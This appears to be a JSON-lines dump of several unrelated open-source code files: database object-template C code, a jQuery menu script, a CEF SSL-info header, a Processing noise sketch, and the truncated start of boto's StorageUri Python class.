complicated because the translation\n * of virtual values to base values was deferred until this step.\n * Now, the values are translated immediately when they are added\n * to the template.\n */\n\nstatic int\nobt_apply_assignment (MOP op, SM_ATTRIBUTE * att, char *mem, DB_VALUE * value, int check_uniques)\n{\n int error = NO_ERROR;\n\n if (!TP_IS_SET_TYPE (TP_DOMAIN_TYPE (att->domain)))\n {\n error = obj_assign_value (op, att, mem, value);\n }\n else\n {\n /* for sets, first apply any templates in the set */\n error = obt_convert_set_templates (db_get_set (value), check_uniques);\n if (error == NO_ERROR)\n\t{\n\n\t /* BE VERY CAREFUL HERE, IN THE OLD VERSION THE SET WAS BEING COPIED ? */\n\t error = obj_assign_value (op, att, mem, value);\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_apply_assignments -\n * return: error code\n * template(in): object template\n * check_uniques(in): true iff check unique constraints\n * level(in): level of recursion (0 for outermost call)\n *\n * Note:\n * This is used to apply the assignments in an object template after all\n * of the appropriate semantic checking has taken place. Technically,\n * there shouldn't be any errors here. If errors do occurr, they will\n * not cause a rollback of any partially applied assignments. The only\n * place this is likely to happen is if there are problems updating\n * the unique constraint table but even this would represent a serious\n * internal error that may have other consequences as well.\n * Update triggers on the individual instances are fired here.\n * If level==0 then do lazy flushing of proxy objects. If level > 0 then\n * do eager flushing of proxy objects because it's a nested proxy insert.\n */\n\nstatic int\nobt_apply_assignments (OBJ_TEMPLATE * template_ptr, int check_uniques, int level)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *a;\n DB_VALUE val;\n int pin, trigstate;\n TR_STATE *trstate;\n DB_OBJECT *temp;\n DB_TRIGGER_EVENT event;\n SM_CLASS *class_;\n DB_OBJECT *object = NULL;\n MOBJ mobj = NULL;\n char *mem;\n int i;\n\n /* have we already been here ? */\n if (template_ptr->traversal == obj_Template_traversal)\n {\n return NO_ERROR;\n }\n template_ptr->traversal = obj_Template_traversal;\n\n /* make sure we have a good template */\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n /* perform all operations on the base class */\n class_ = OBT_BASE_CLASS (template_ptr);\n\n /*\n * figure out what kind of triggers to fire here, only do this\n * if the class indicates that there are active triggers\n */\n trigstate = sm_active_triggers (OBT_BASE_CLASSOBJ (template_ptr), class_, TR_EVENT_ALL);\n if (trigstate < 0)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n event = TR_EVENT_NULL;\n if (trigstate)\n {\n if (template_ptr->object == NULL)\n\t{\n\t event = TR_EVENT_INSERT;\n\t}\n else\n\t{\n\t event = TR_EVENT_UPDATE;\n\t}\n }\n\n /* Collect triggers */\n trstate = NULL;\n temp = NULL;\n if (event != TR_EVENT_NULL)\n {\n if (tr_prepare_class (&trstate, class_->triggers, OBT_BASE_CLASSOBJ (template_ptr), event))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n if (event == TR_EVENT_UPDATE)\n\t{\n\t for (i = 0; i < template_ptr->nassigns; i++)\n\t {\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t\t{\n\t\t continue;\n\t\t}\n\t if (tr_prepare_class (&trstate, a->att->triggers, OBT_BASE_CLASSOBJ (template_ptr), event))\n\t\t{\n\t\t tr_abort (trstate);\n\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t}\n\t }\n\t}\n }\n\n /* Evaluate BEFORE triggers */\n pin = -1;\n if (trstate == NULL)\n {\n /* no triggers, lock/create the object */\n error = access_object (template_ptr, &object, &mobj);\n if (error == NO_ERROR)\n\t{\n\t pin = ws_pin (object, 1);\n\t}\n }\n else\n {\n /* make the temporary object for the template */\n temp = make_temp_object (OBT_BASE_CLASSOBJ (template_ptr), template_ptr);\n if (temp == NULL)\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t}\n else\n\t{\n\t if (event == TR_EVENT_INSERT)\n\t {\n\t /* evaluate triggers before creating the object */\n\t if (!(error = tr_before_object (trstate, NULL, temp)))\n\t\t{\n\t\t /* create the new object */\n\t\t if (!(error = access_object (template_ptr, &object, &mobj)))\n\t\t {\n\t\t pin = ws_pin (object, 1);\n\t\t }\n\t\t}\n\t else\n\t\ttrstate = NULL;\n\t }\n\t else\n\t {\n\t /* lock the object first, then evaluate the triggers */\n\t if (!(error = access_object (template_ptr, &object, &mobj)))\n\t\t{\n\t\t if ((error = tr_before_object (trstate, object, temp)))\n\t\t {\n\t\t trstate = NULL;\n\t\t }\n\t\t}\n\n\t /* in some cases, the object has been decached in before trigger. we need fetch it again. */\n\t if (error == NO_ERROR && object->decached)\n\t\t{\n\t\t error = au_fetch_instance_force (object, &mobj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION);\n\t\t if (error != NO_ERROR)\n\t\t {\n\t\t if (trstate != NULL)\n\t\t\t{\n\t\t\t tr_abort (trstate);\n\t\t\t}\n\t\t if (temp != NULL)\n\t\t\t{\n\t\t\t free_temp_object (temp);\n\t\t\t}\n\n\t\t if (WS_IS_DELETED (object))\n\t\t\t{\n\t\t\t return NO_ERROR;\n\t\t\t}\n\n\t\t return error;\n\t\t }\n\t\t}\n\t /* set pin after before trigger */\n\t pin = ws_pin (object, 1);\n\t }\n\t}\n }\n\n /* Apply the assignments */\n for (i = 0; i < template_ptr->nassigns && error == NO_ERROR; i++)\n {\n a = template_ptr->assignments[i];\n if (a == NULL)\n\tcontinue;\n\n /* find memory pointer if this is an instance attribute */\n mem = NULL;\n if (a->att->header.name_space == ID_ATTRIBUTE && mobj != NULL)\n\t{\n\t mem = (char *) mobj + a->att->offset;\n\t}\n\n /* save old value for AFTER triggers */\n if (trstate != NULL && trstate->triggers != NULL && event == TR_EVENT_UPDATE)\n\t{\n\t a->old_value = pr_make_ext_value ();\n\t if (a->old_value == NULL)\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t }\n\t else\n\t {\n\t /*\n\t * this will copy the value which is unfortunate since\n\t * we're just going to throw it away later\n\t */\n\t error = obj_get_value (object, a->att, mem, NULL, a->old_value);\n\t }\n\t}\n\n /*\n * The following code block is for handling LOB type.\n * If the client is the log applier, it doesn't care LOB type.\n */\n if (db_get_client_type () != DB_CLIENT_TYPE_LOG_APPLIER)\n\t{\n\n\t if (a->att->type->id == DB_TYPE_BLOB || a->att->type->id == DB_TYPE_CLOB)\n\t {\n\t DB_VALUE old;\n\t DB_TYPE value_type;\n\n\t db_value_domain_init (&old, a->att->type->id, DB_DEFAULT_PRECISION, DB_DEFAULT_SCALE);\n\t error = obj_get_value (object, a->att, mem, NULL, &old);\n\t if (error == NO_ERROR && !db_value_is_null (&old))\n\t\t{\n\t\t DB_ELO *elo;\n\n\t\t value_type = db_value_type (&old);\n\t\t assert (value_type == DB_TYPE_BLOB || value_type == DB_TYPE_CLOB);\n\t\t elo = db_get_elo (&old);\n\t\t if (elo)\n\t\t {\n\t\t error = db_elo_delete (elo);\n\t\t }\n\t\t db_value_clear (&old);\n\t\t error = (error >= 0 ? NO_ERROR : error);\n\t\t}\n\t if (error == NO_ERROR && !db_value_is_null (a->variable))\n\t\t{\n\t\t DB_ELO dest_elo, *elo_p;\n\t\t char *save_meta_data;\n\n\t\t value_type = db_value_type (a->variable);\n\t\t assert (value_type == DB_TYPE_BLOB || value_type == DB_TYPE_CLOB);\n\t\t elo_p = db_get_elo (a->variable);\n\n\t\t assert (sm_ch_name ((MOBJ) class_) != NULL);\n\t\t save_meta_data = elo_p->meta_data;\n\t\t elo_p->meta_data = (char *) sm_ch_name ((MOBJ) class_);\n\t\t error = db_elo_copy (db_get_elo (a->variable), &dest_elo);\n\t\t elo_p->meta_data = save_meta_data;\n\n\t\t error = (error >= 0 ? NO_ERROR : error);\n\t\t if (error == NO_ERROR)\n\t\t {\n\t\t db_value_clear (a->variable);\n\t\t db_make_elo (a->variable, value_type, &dest_elo);\n\t\t (a->variable)->need_clear = true;\n\t\t }\n\t\t}\n\t }\t\t\t/* if (a->att->type->id == DB_TYPE_BLOB) || */\n\t}\t\t\t/* if (db_get_client_type () != */\n\n if (error == NO_ERROR)\n\t{\n\t /* check for template assignment that needs to be expanded */\n\t if (a->obj != NULL)\n\t {\n\t /* this is a template assignment, recurse on this template */\n\t error = obt_apply_assignments (a->obj, check_uniques, level + 1);\n\t if (error == NO_ERROR)\n\t\t{\n\t\t db_make_object (&val, a->obj->object);\n\t\t error = obt_apply_assignment (object, a->att, mem, &val, check_uniques);\n\t\t}\n\t }\n\t else\n\t {\n\t /* non-template assignment */\n\t error = obt_apply_assignment (object, a->att, mem, a->variable, check_uniques);\n\t }\n\t}\n }\n\n if ((error == NO_ERROR) && (object != NULL))\n {\n ws_dirty (object);\n }\n\n /* if we updated any shared attributes, we need to mark the class dirty */\n if (template_ptr->shared_was_modified)\n {\n ws_dirty (OBT_BASE_CLASSOBJ (template_ptr));\n }\n\n /* unpin the object */\n if (pin != -1)\n {\n (void) ws_pin (object, pin);\n }\n\n /* run after triggers */\n if (trstate != NULL)\n {\n if (error)\n\t{\n\t tr_abort (trstate);\n\t}\n else\n\t{\n\t if (event == TR_EVENT_INSERT)\n\t {\n\t error = tr_after_object (trstate, object, NULL);\n\t }\n\t else\n\t {\n\t /* mark the template as an \"old\" object */\n\t template_ptr->is_old_template = 1;\n\t error = tr_after_object (trstate, object, temp);\n\t }\n\t}\n }\n\n if (temp != NULL)\n {\n /* free this after both before and after triggers have run */\n free_temp_object (temp);\n }\n\n /*\n * If this is a virtual instance, we used to flush it back to the server\n * at this point. But that early flushing is too expensive. Consider, for\n * example, that all db_template-based proxy inserts go thru this code and\n * experience a 25-30 fold performance slowdown. Therefore, we delay\n * flushing dirty proxy mops for non-nested proxy inserts. It's not clear\n * under what conditions we can safely delay flushing of nested proxy\n * inserts, so we don't.\n */\n if (level > 0 && error == NO_ERROR && object && object->is_vid && vid_is_base_instance (object))\n {\n error = vid_flush_and_rehash (object);\n }\n else if (error != NO_ERROR && object && object->is_vid && vid_is_base_instance (object))\n {\n /*\n * if an error occurred in a nested proxy insert such as this\n * insert into c_h_employee values ('new_e', 123456789,\n * (insert into c_h_department (dept_no) values (11)),NULL)\n * we must decache the outer proxy object, otherwise a later flush\n * will generate incorrect results. Note that vid_flush_and_rehash\n * already decaches any offending inner nested proxy inserts.\n */\n ws_decache (object);\n }\n\n /*\n * check for unique constraint violations.\n * if the object has uniques and this is an insert, we must\n * flush the object to ensure that the btrees for the uniques\n * are updated correctly.\n * NOTE: Performed for updates now too since test & set doesn't work.\n */\n if (error == NO_ERROR)\n {\n if ((check_uniques && template_ptr->uniques_were_modified) || template_ptr->fkeys_were_modified\n\t || template_ptr->function_key_modified || template_ptr->force_flush\n\t || (template_ptr->check_serializable_conflict && template_ptr->object\n\t && !OID_ISTEMP (&(template_ptr->object->oid_info.oid))))\n\t{\n\t if ((locator_flush_class (OBT_BASE_CLASSOBJ (template_ptr)) != NO_ERROR)\n\t || (locator_flush_instance (OBT_BASE_OBJECT (template_ptr)) != NO_ERROR))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t }\n\t /* update template object if this was a partitioned class */\n\t object = OBT_BASE_OBJECT (template_ptr);\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_set_label - This is called by the interpreter when a certain template\n * is referenced by a interpreter variable (label).\n * return: none\n * template(in): object template\n * label(in): pointer to MOP pointer\n *\n * Note :\n * In this case, when the template is converted into a MOP, the pointer\n * supplied is also set to the value of this mop.\n *\n */\n\nvoid\nobt_set_label (OBJ_TEMPLATE * template_ptr, DB_VALUE * label)\n{\n template_ptr->label = label;\n}\n\n/*\n * obt_disable_unique_checking\n * return: none\n * template(in): object template\n *\n * Note :\n * This is called by the interpreter when doing a bulk update to disable\n * unique constraint checking on a per instance basis. It is the\n * interpreter's responsibility to check for constraints.\n *\n */\n\nvoid\nobt_disable_unique_checking (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr)\n {\n template_ptr->check_uniques = 0;\n }\n}\n\n/*\n * obt_disable_serializable_conflict_checking : disable SERIALIZABLE conflicts\n *\t\t\t\t\t checking\n * return: none\n * template(in): object template\n */\nvoid\nobt_disable_serializable_conflict_checking (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr)\n {\n template_ptr->check_serializable_conflict = 0;\n }\n}\n\n/*\n * obt_enable_unique_checking - This is used by the loader to disable unique\n * constraint checking for all templates created.\n * When templates are created this state is\n * incorporated in the template, see make_template()\n * return: The previous state is returned.\n * TRUE : global unique checking is enabled.\n * FALSE : global unique checking is disabled.\n * new_state(in):\n *\n */\nbool\nobt_enable_unique_checking (bool new_state)\n{\n bool old_state = obt_Check_uniques;\n\n obt_Check_uniques = new_state;\n return (old_state);\n}\n\n/*\n * obj_set_force_flush - set force_flush flag of the template\n *\n * return : void\n * template_ptr (in/out)\n */\nvoid\nobt_set_force_flush (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->force_flush = 1;\n}\n\n/*\n * obj_reset_force_flush - reset force_flush flag of the template\n *\n * return : void\n * template_ptr (in/out)\n */\nvoid\nobt_reset_force_flush (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->force_flush = 0;\n}\n\n/*\n * obt_retain_after_finish\n * return: none\n * template(in):\n *\n */\nvoid\nobt_retain_after_finish (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->discard_on_finish = 0;\n}\n\n/*\n * obt_update_internal\n * return: error code\n * template(in): object template\n * newobj(in): return pointer to mop of new instance\n * check_non_null(in): set if this is an internally defined template\n *\n */\nint\nobt_update_internal (OBJ_TEMPLATE * template_ptr, MOP * newobj, int check_non_null)\n{\n int error = NO_ERROR;\n char savepoint_name[80];\n int has_uniques = 0;\n int savepoint_used = 0;\n\n if (template_ptr != NULL)\n {\n error = validate_template (template_ptr);\n if (error == NO_ERROR)\n\t{\n\t /* allocate a new traversal counter for the check pass */\n\t begin_template_traversal ();\n\t error = obt_final_check (template_ptr, check_non_null, &has_uniques);\n\t if (error == NO_ERROR)\n\t {\n\n\t if (db_get_client_type () == DB_CLIENT_TYPE_LOG_APPLIER)\n\t\t{\n\t\t /*\n\t\t * Only one of the log_applier can apply replication\n\t\t * logs at the same time.\n\t\t * Therefore, log_applier don't need to perform\n\t\t * savepoint at this time to maintain unique indexes.\n\t\t */\n\n\t\t /* do nothing */\n\t\t ;\n\t\t}\n\t else if ((template_ptr->check_uniques && has_uniques) || template_ptr->fkeys_were_modified\n\t\t || template_ptr->function_key_modified || template_ptr->force_flush)\n\t\t{\n\t\t /* Must perform savepoint to handle unique maintenance until the time when test & set will work\n\t\t * correctly. We must do a savepoint if this template or any sub template has uniques. The actual\n\t\t * unique tests will be done in obt_apply_assignments(). */\n\n\t\t sprintf (savepoint_name, \"%s-%d\", OBJ_INTERNAL_SAVEPOINT_NAME, template_savepoint_count++);\n\t\t if (tran_system_savepoint (savepoint_name) != NO_ERROR)\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\t\t savepoint_used = 1;\n\t\t}\n\n\t /* allocate another traversal counter for the assignment pass */\n\t begin_template_traversal ();\n\t error = obt_apply_assignments (template_ptr, template_ptr->check_uniques, 0);\n\t if (error == NO_ERROR)\n\t\t{\n\t\t if (newobj != NULL)\n\t\t {\n\t\t *newobj = template_ptr->object;\n\t\t }\n\n\t\t /* When discard_on_finish is false, caller should explictly free template */\n\t\t if (template_ptr->discard_on_finish)\n\t\t {\n\t\t obt_free_template (template_ptr);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n /*\n * do we need to rollback due to failure? We don't rollback if the\n * trans has already been aborted.\n */\n if (error != NO_ERROR && savepoint_used && error != ER_LK_UNILATERALLY_ABORTED)\n {\n (void) tran_abort_upto_system_savepoint (savepoint_name);\n }\n\n return error;\n}\n\n/*\n * Don't change the external interface to allow setting the check_non_null\n * flag.\n */\n/*\n * obt_update - This will take an object template and apply all of\n * the assignments, creating new objects as necessary\n * return: error code\n * template(in): object template\n * newobj(in): return pointer to mop of new instance\n *\n * Note:\n * If the top level template is for a new object, the mop will be returned\n * through the \"newobj\" parameter.\n * Note that the template will be freed here if successful\n * so the caller must not asusme that it can be reused.\n * The check_non_null flag is set in the case where the template\n * is being created in response to the obj_create() function which\n * implements the db_create() and db_create_by_name API functions.\n * Unfortunately, as the functions are defined, there is no way\n * to supply initial values. If the class has attributes that are\n * defined with the NON NULL constraint, the usual template processing\n * refuses to create the object until the missing values\n * are supplied. This means that it is impossible for the \"atomic\"\n * functions like db_create() to make an object whose attributes\n * have the constraint. This is arguably the correct behavior but\n * it hoses 4GE since it isn't currently prepared to go check for\n * creation dependencies and use full templates instead.\n */\nint\nobt_update (OBJ_TEMPLATE * template_ptr, MOP * newobj)\n{\n return obt_update_internal (template_ptr, newobj, 1);\n}\n\n/*\n * make_temp_object - This is used to create a temporary object for use\n * in trigger processing.\n * return: temporary object MOP\n * class(in):\n * object(in): object template with values\n *\n */\nstatic MOP\nmake_temp_object (DB_OBJECT * class_, OBJ_TEMPLATE * object)\n{\n MOP obj = NULL;\n\n if (class_ == NULL || object == NULL)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_TEMP_OBJECT, 0);\n }\n else\n {\n obj = ws_make_temp_mop ();\n if (obj != NULL)\n\t{\n\t obj->class_mop = class_;\n\t obj->object = (void *) object;\n\t obj->pruning_type = object->pruning_type;\n\t /*\n\t * We have to be very careful here - we need to mimick the old oid\n\t * for \"old\" to behave correctly.\n\t */\n\t if (object->object)\n\t {\n\t obj->oid_info.oid = object->object->oid_info.oid;\n\t }\n\t}\n }\n\n return obj;\n}\n\n/*\n * free_temp_object - This frees the temporary object created by\n * make_temp_object. It does NOT free the template,\n * only the MOP.\n * return: none\n * obj(in): temporary object\n *\n */\nstatic void\nfree_temp_object (MOP obj)\n{\n if (obj != NULL)\n {\n obj->class_mop = NULL;\n obj->object = NULL;\n ws_free_temp_mop (obj);\n }\n}\n\n/*\n * obt_populate_known_arguments - Populate default and auto_increment\n *\t\t\t\t arguments of template_ptr\n * return: error code if unsuccessful\n *\n * template_ptr(in): temporary object\n *\n * Note :\n * This is necessary for INSERT templates. The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name, we don't generate an error because its ok to override\n * a default value or an auto_increment value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given and the default or\n * auto_increment value is ignored.\n *\n */\nint\nobt_populate_known_arguments (OBJ_TEMPLATE * template_ptr)\n{\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (template_ptr->is_class_update)\n {\n return NO_ERROR;\n }\n\n if (populate_defaults (template_ptr) != NO_ERROR)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (obt_Enable_autoincrement != true)\n {\n return NO_ERROR;\n }\n\n if (populate_auto_increment (template_ptr) != NO_ERROR)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n return NO_ERROR;\n}\n\n/*\n * obt_begin_insert_values -\n *\n * return: none\n *\n */\nvoid\nobt_begin_insert_values (void)\n{\n obt_Last_insert_id_generated = false;\n}\n"} {"text": "// Browse menu dropdown\n\nvar $ = require('jquery')\n\n/**\n * Show or hide the browse menus. If no `menu` parameter is provided, then\n * this shows\n * @param {jQuery=} menu to show/hide\n * @param {boolean=} toggle force the menu open?\n */\nfunction toggleBrowseMenu (menu, toggle) {\n if (toggle == null) toggle = !menu.$browse.hasClass('on')\n\n menu.$btn.toggleClass('on', toggle)\n menu.$browse.toggleClass('on', toggle)\n\n // Update chevron icon\n var icon = menu.$btn.find('i')\n if (toggle) {\n icon\n .removeClass('icon-down-open')\n .addClass('icon-up-open')\n } else {\n icon\n .addClass('icon-down-open')\n .removeClass('icon-up-open')\n }\n}\n\nvar browseMenus = []\nwindow.closeBrowseMenus = function () {\n browseMenus.forEach(function (menu) {\n toggleBrowseMenu(menu, false)\n })\n}\n\n// Get all the browse menus in the page\n$('.browse').each(function (i, elem) {\n var $elem = $(elem)\n var name = /browse-(\\w+)/.exec($elem.attr('class'))\n if (name) {\n name = name[1]\n var menu = {\n name: name,\n $btn: $('.header .' + name),\n $browse: $elem,\n btnHover: false,\n browseHover: false\n }\n\n var maybeOpenClose = function () {\n if (menu.btnHover || menu.browseHover) {\n // Only show on larger screens\n if (window.StudyNotes.isMobile) return\n toggleBrowseMenu(menu, true)\n } else if (!menu.btnHover || !menu.browseHover) {\n toggleBrowseMenu(menu, false)\n }\n }\n\n menu.$btn.hover(function () {\n menu.btnHover = true\n maybeOpenClose()\n }, function () {\n menu.btnHover = false\n maybeOpenClose()\n })\n menu.$browse.hover(function () {\n menu.browseHover = true\n maybeOpenClose()\n }, function () {\n menu.browseHover = false\n maybeOpenClose()\n })\n\n browseMenus.push(menu)\n }\n})\n\n// Close browse menu on search focus\n$('.header .search').on('focusin', function () {\n window.closeBrowseMenus()\n})\n"} {"text": "// Copyright (c) 2017 Marshall A. Greenblatt. All rights reserved.\n//\n// Redistribution and use in source and binary forms, with or without\n// modification, are permitted provided that the following conditions are\n// met:\n//\n// * Redistributions of source code must retain the above copyright\n// notice, this list of conditions and the following disclaimer.\n// * Redistributions in binary form must reproduce the above\n// copyright notice, this list of conditions and the following disclaimer\n// in the documentation and/or other materials provided with the\n// distribution.\n// * Neither the name of Google Inc. nor the name Chromium Embedded\n// Framework nor the names of its contributors may be used to endorse\n// or promote products derived from this software without specific prior\n// written permission.\n//\n// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n// \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n//\n// ---------------------------------------------------------------------------\n//\n// This file was generated by the CEF translator tool and should not edited\n// by hand. See the translator.README.txt file in the tools directory for\n// more information.\n//\n\n#ifndef CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n#define CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n#pragma once\n\n#include \"include/capi/cef_base_capi.h\"\n#include \"include/capi/cef_values_capi.h\"\n#include \"include/capi/cef_x509_certificate_capi.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n///\n// Structure representing SSL information.\n///\ntypedef struct _cef_sslinfo_t {\n ///\n // Base structure.\n ///\n cef_base_ref_counted_t base;\n\n ///\n // Returns a bitmask containing any and all problems verifying the server\n // certificate.\n ///\n cef_cert_status_t (CEF_CALLBACK *get_cert_status)(\n struct _cef_sslinfo_t* self);\n\n ///\n // Returns the X.509 certificate.\n ///\n struct _cef_x509certificate_t* (CEF_CALLBACK *get_x509certificate)(\n struct _cef_sslinfo_t* self);\n} cef_sslinfo_t;\n\n\n///\n// Returns true (1) if the certificate status has any error, major or minor.\n///\nCEF_EXPORT int cef_is_cert_status_error(cef_cert_status_t status);\n\n///\n// Returns true (1) if the certificate status represents only minor errors (e.g.\n// failure to verify certificate revocation).\n///\nCEF_EXPORT int cef_is_cert_status_minor_error(cef_cert_status_t status);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif // CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n"} {"text": "// M_1_3_02.pde\n// \n// Generative Gestaltung, ISBN: 978-3-87439-759-9\n// First Edition, Hermann Schmidt, Mainz, 2009\n// Hartmut Bohnacker, Benedikt Gross, Julia Laub, Claudius Lazzeroni\n// Copyright 2009 Hartmut Bohnacker, Benedikt Gross, Julia Laub, Claudius Lazzeroni\n//\n// http://www.generative-gestaltung.de\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\n/**\n * creates a texture based on random values\n * \n * MOUSE\n * click : new noise line\n * \n * KEYS\n * s : save png\n */\n\nimport java.util.Calendar;\n\nint actRandomSeed = 0;\n\nvoid setup() {\n size(512,512); \n}\n\nvoid draw() {\n background(0);\n\n randomSeed(actRandomSeed);\n \n loadPixels();\n for (int x = 0; x < width; x++) {\n for (int y = 0; y < height; y++) {\n float randomValue = random(255);\n pixels[x+y*width] = color(randomValue);\n }\n }\n updatePixels();\n}\n\nvoid mouseReleased() {\n actRandomSeed = (int) random(100000);\n}\n\nvoid keyReleased() { \n if (key == 's' || key == 'S') saveFrame(timestamp()+\"_####.png\");\n}\n\nString timestamp() {\n Calendar now = Calendar.getInstance();\n return String.format(\"%1$ty%1$tm%1$td_%1$tH%1$tM%1$tS\", now);\n}\n\n\n\n\n\n\n\n\n\n\n\n"} {"text": "# Copyright 2010 Google Inc.\n# Copyright (c) 2011, Nexenta Systems Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish, dis-\n# tribute, sublicense, and/or sell copies of the Software, and to permit\n# persons to whom the Software is furnished to do so, subject to the fol-\n# lowing conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-\n# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT\n# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nimport boto\nimport os\nimport sys\nimport textwrap\nfrom boto.s3.deletemarker import DeleteMarker\nfrom boto.exception import BotoClientError\nfrom boto.exception import InvalidUriError\n\n\nclass StorageUri(object):\n \"\"\"\n Base class for representing storage provider-independent bucket and\n object name with a shorthand URI-like syntax.\n\n This is an abstract class: the constructor cannot be called (throws an\n exception if you try).\n \"\"\"\n\n connection = None\n # Optional args that can be set from one of the concrete subclass\n # constructors, to change connection behavior (e.g., to override\n # https_connection_factory).\n connection_args = None\n\n # Map of provider scheme ('s3' or 'gs') to AWSAuthConnection object. We\n # maintain a pool here in addition to the connection pool implemented\n # in AWSAuthConnection because the latter re-creates its connection pool\n # every time that class is instantiated (so the current pool is used to\n # avoid re-instantiating AWSAuthConnection).\n provider_pool = {}\n\n def __init__(self):\n \"\"\"Uncallable constructor on abstract base StorageUri class.\n \"\"\"\n raise BotoClientError('Attempt to instantiate abstract StorageUri '\n 'class')\n\n def __repr__(self):\n \"\"\"Returns string representation of URI.\"\"\"\n return self.uri\n\n def equals(self, uri):\n \"\"\"Returns true if two URIs are equal.\"\"\"\n return self.uri == uri.uri\n\n def check_response(self, resp, level, uri):\n if resp is None:\n raise InvalidUriError('\\n'.join(textwrap.wrap(\n 'Attempt to get %s for \"%s\" failed. This can happen if '\n 'the URI refers to a non-existent object or if you meant to '\n 'operate on a directory (e.g., leaving off -R option on gsutil '\n 'cp, mv, or ls of a bucket)' % (level, uri), 80)))\n\n def _check_bucket_uri(self, function_name):\n if issubclass(type(self), BucketStorageUri) and not self.bucket_name:\n raise InvalidUriError(\n '%s on bucket-less URI (%s)' % (function_name, self.uri))\n\n def _check_object_uri(self, function_name):\n if issubclass(type(self), BucketStorageUri) and not self.object_name:\n raise InvalidUriError('%s on object-less URI (%s)' %\n (function_name, self.uri))\n\n def _warn_about_args(self, function_name, **args):\n for arg in args:\n if args[arg]:\n sys.stderr.write(\n 'Warning: %s ignores argument: %s=%s\\n' %\n (function_name, arg, str(args[arg])))\n\n def connect(self, access_key_id=None, secret_access_key=None, **kwargs):\n \"\"\"\n Opens a connection to appropriate provider, depending on provider\n portion of URI. Requires Credentials defined in boto config file (see\n boto/pyami/config.py).\n @type storage_uri: StorageUri\n @param storage_uri: StorageUri specifying a bucket or a bucket+object\n @rtype: L{AWSAuthConnection}\n @return: A connection to storage service provider of the given URI.\n \"\"\"\n connection_args = dict(self.connection_args or ())\n\n if (hasattr(self, 'suppress_consec_slashes') and\n 'suppress_consec_slashes' not in connection_args):\n connection_args['suppress_consec_slashes'] = (\n self.suppress_consec_slashes)\n connection_args.update(kwargs)\n if not self.connection:\n if self.scheme in self.provider_pool:\n self.connection = self.provider_pool[self.scheme]\n elif 